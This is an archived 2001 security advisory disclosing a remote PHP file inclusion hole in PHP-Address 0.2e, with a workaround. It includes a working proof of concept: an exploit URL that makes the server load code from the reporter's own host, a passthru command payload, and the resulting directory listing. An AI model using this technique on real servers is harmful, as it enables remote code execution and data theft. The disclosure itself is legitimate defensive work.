OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: tim vandermeersch (tim.vandermeerschpandora.be)
Date: Tue Dec 25 2001 - 22:19:11 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    PHP source injection in PHPAddress

    Description

    PHP-Address is a collection of PHP3-Scripts (works on PHP4 too)
    for maintaing a small web-based address-database. It can be found
    at http://phpaddress.huebsch-gemacht.de/

    Workaround

    Change the global.php3 file so it looks like this:
    <?php
    # (c) Copyright in 2000, 2001 by Chris Huebsch
    (chuinformatik.tu-chemnitz.de)
    $LanCookie = ""; // THIS LINE
    if ($LangCookie)
      require("$LangCookie.php3"); // Line 5
    ...

    Tested version

    PHP Address 0.2e (09.12.2001)

    The Problem

    Any user who requests an url like
    "http://SERVER/globals.php3?LangCookie=INCLUDE_FILE" is
    able to include any file he wants.

    Example

    I putted a PHP script on my server wich I wanted to include:

    ------------x.php3------------
    <?
        passthru("/bin/ls /");
    ?>
    -------------------------------

    then i requested this url:
    http://SERVER/globals.php3?LangCookie=http://MYSERVER/x
    (the .php3 is allready there look at line 5 in global.php3)

    ------------output------------
    bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp
    usr var
    ------------------------------

    Note that any PHP code could be included, malicious users could get access
    to database
    passwords, personal information, ...

    ------------------------------
    Tim Vandermeersch
    Tim.Vandermeerschpandora.be